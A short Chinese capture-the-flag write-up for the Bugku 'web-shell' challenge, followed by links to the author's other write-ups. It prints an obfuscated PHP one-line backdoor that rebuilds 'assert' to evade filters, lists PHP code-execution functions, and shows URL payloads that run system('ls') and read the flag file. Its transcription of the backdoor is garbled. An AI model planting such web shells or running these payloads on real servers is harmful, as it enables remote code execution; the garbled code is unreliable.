bugku-web-shell

打开环境

什么都没有

提示:

送给大家一个过狗一句话

$poc="a#s#s#e#r#t";

poc_1=explode("#",poc);

poc_2=poc_10.poc_1\[1\].poc_12.poc_1\[3\].poc_14.poc_1\[5\]; poc_2($_GET's')

explode():把字符串打散为数组(php内置函数

$poc_2 = 'assert';

php特性:变量名 加 括号()=当函数来执行

$poc_2 = "assert";

$poc_2( 内容 ); → 等价于 assert( 内容 );

最常见的「后门函数」

PHP 里专门执行系统命令的函数

  • assert()
  • eval()
  • system()
  • exec()
  • shell_exec()
  • passthru()
  • include / require
  • system()
  • exec()
  • shell_exec()

url?s=system('ls')

如果是windows服务器要用dir

url?s=system('cat flaga15808abee46a1d5.txt')

相关推荐
hengdonghui1 天前
Writeup 4 红帽杯 2021 WebsiteManger
web·ctf·ssrf·sql布尔盲注
hengdonghui3 天前
Writeup 4 2020 - 之江杯 - 异常的流量分析
wireshark·ctf·流量分析
hengdonghui3 天前
Writeup 4 津门杯 2021 Web hate_php
php·web·ctf·通配符
hengdonghui3 天前
Writeup 4 红帽杯 2021 Web Find_It
web·ctf·备份文件泄露
hengdonghui4 天前
Writeup 4 强网杯 2019 强网先锋打野
ctf·misc·zsteg
hengdonghui4 天前
Writeup 4 NUAA 2017 robots
android·ctf·re
hengdonghui4 天前
Writeup 4 CSS CTF Semester 2 2026 - Lamp Drill
ctf·re
hengdonghui5 天前
Writeup 4 CSS CTF Semester 2 2026 Cryptography Chrono I
ctf·维吉尼亚密码·crypto
hengdonghui5 天前
Writeup 4 CSS CTF Semester 2 2026 - Dead Faction Servers
ctf·osint
hengdonghui6 天前
Writeup 4 2020 - 之江杯 - 工控现场的恶意扫描
wireshark·ctf·流量分析